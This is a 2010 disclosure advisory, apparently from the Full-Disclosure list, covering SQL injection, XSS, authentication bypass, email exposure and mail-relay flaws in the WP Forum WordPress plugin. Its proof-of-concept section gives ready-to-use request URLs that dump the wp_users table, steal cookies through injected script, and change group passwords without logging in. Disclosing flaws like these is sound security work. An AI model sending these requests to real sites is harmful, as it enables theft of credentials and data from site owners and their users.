Multiple Vulnerabilities in WP Forum (WordPress Plugin) 1. Advisory Information
Title: Multiple Vulnerabilities in WP-Forum Advisory URL: http://www.charleshooper.net/advisories/ Date Published: 12/17/2010 Vendors Contacted: WordPress. Maintainer of plugin is unreachable. 2. Summary WP Forum is a plugin for the popular blog tool and publishing platform, WordPress. The author of WP Forum describes it as a "Simple discussion forum plugin" and "easy to use and administer." There exist multiple vulnerabilities in WP Forum. Basically, input validation is not performed at all resulting in SQL injection, stored XSS, and reflected XSS vulns. Furthermore, the author wrote the plugin under the assumption that it would only be executed within the context of the WordPress administrative panel, thereby neglecting to perform proper authentication and authorization. 3. Vulnerability Information Packages/Versions Affected: Probably all, but confirmed only on WP Forum 1.7.8 3a. Type: SQL Injection [CWE-89] 3a. Impact: Read application data, bypass protection mechanism, modify application data. There are multiple SQL injections present in WP Forum. The most prominent of which is the SQL injection present in the `group_login` functionality. Prior to logging in, an attacker can retrieve each group's passwords due to the vulnerability listed below (3b). 3b. Type: Plaintext Storage of a Password [CWE-256] 3b. Impact: Password is easily retrieved from database 3c. Type: XSS (Stored or Reflected) [CWE-79] 3c. Impact: Execute unauthorized code or commands 3d. Type: Auth Bypass via Direct Request [CWE-425] 3d. Impact: Many or all of the administrative functions assume they are running in the context of the WordPress administrative section. As a result, they often do not check that the user is authenticated or authorized to perform a particular action. Example functionality includes adding or removing forum moderators and deleting forums. This vulnerability could lead to information exposure, privilege escalation, or data loss. 3e. Type: Information Exposure Through Sent Data [CWE-201] 3e. Impact: `sendmail.php` discloses users' email addresses by accepting a user- provider "user" variable and returns a hidden <input/> tag containing that user's email address. 3f. Type: External Control of Assumed-Immutable Web Parameter [CWE-472] 3f. Impact: `sendmail.php` accepts user-provided input allowing it to be used as an email relay 4. PoC & Technical Description Due to the number of vulnerabilities in this package, I will not discuss each one individually. Instead, here are some sample POCs. Many more exploitable vulns exist in this package than what I am providing here. 4a. http://path.to/wordpress/?page_id=<forum>&forumaction=group_login&group_id=0%20UNION%20SELECT%20CONCAT_WS%28CHAR%2858%29,user_login,user_pass,user_email%29%20FROM%20wp_users%20LIMIT%201%20%23 or (goes for all POCs): http://path.to/wordpress/<forum>?forumaction=group_login&group_id=0%20UNION%20SELECT%20CONCAT_WS%28CHAR%2858%29,user_login,user_pass,user_email%29%20FROM%20wp_users%20LIMIT%201%20%23 4b. N/A 4c. http://path.to/wordpress/<forum>?forumaction=group_login&group_id=<script>alert(document.cookie);<%2fscript> 4d. http://path.to/wordpress/wp-content/plugins/wpforum/wp-forum-manage.php?editgroupsubmit=true&group=<group id>&groupname=<new group name>&passwd=<new group password> 4e. http://path.to/wordpress/wp-content/plugins/wpforum/sendmail.php?user=<user id> (email address will be in HTML source) 4f. POST 'submit=true&sender=<from address>&email=<to address>&message=<body>&subject=<subject>&replyto=<replyto> to http://path.to/wordpress/wp-content/plugins/wpforum/sendmail.php (untested) 5. Report Timeline 12/10/2010 Initial email sent to WordPress security. 12/10/2010 Maintainer not yet contacted as project appears abandoned and maintainer does not have listed contact information. 12/17/2010 No reply from WordPress security. Advisory released. 6. References 6a. The WordPress Plugin page for WP Forum: http://wordpress.org/extend/plugins/wpforum/ 6b. The WordPress Profile page for the author of the plugin: http://profiles.wordpress.org/users/fahlstad/ 6c. The plugin author's website: http://www.fahlstad.se/ 7. Legalese This vulnerability report by Charles Hooper < choo...@plumata.com > is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License. 8. Signature Public Key: Obtainable via pool.sks-keyservers.net _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/